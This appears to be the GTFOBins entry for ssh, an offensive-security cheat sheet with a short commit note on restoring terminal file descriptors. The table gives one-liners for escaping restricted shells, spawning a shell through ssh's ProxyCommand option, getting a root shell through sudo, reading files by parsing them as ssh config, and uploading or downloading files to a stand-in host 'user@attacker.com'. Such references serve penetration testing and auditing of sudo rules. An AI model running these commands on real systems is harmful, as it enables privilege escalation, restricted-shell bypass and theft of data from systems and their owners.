GTFOBins.github.io/_gtfobins/ssh.md
Andrea Cardaci 8eaf595fe6 Make interactive execute whenever possible
Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged; in that case we can use
`tty` to perform the redirection: `sh <$(tty) >$(tty) 2>$(tty)`
2018-09-07 01:11:06 +02:00


Functions: execute-interactive, upload, download, file-read, sudo-enabled

| Function | Description | Code |
| --- | --- | --- |
| execute-interactive | Reconnecting may help bypass restricted shells. | `ssh localhost $SHELL --noprofile --norc` |
| execute-interactive | Spawn an interactive shell through the `ProxyCommand` option. | `ssh -o ProxyCommand=';sh 0<&2 1>&2' x` |
| upload | Send a local file to an SSH server. | `HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH` |
| download | Fetch a remote file from an SSH server. | `HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH` |
| file-read | The file content is read, but it is mixed with the error messages ssh prints while parsing it as a config file. | `LFILE=file_to_read ssh -F $LFILE localhost` |
| sudo-enabled | Spawn an interactive root shell through the `ProxyCommand` option. | `sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x` |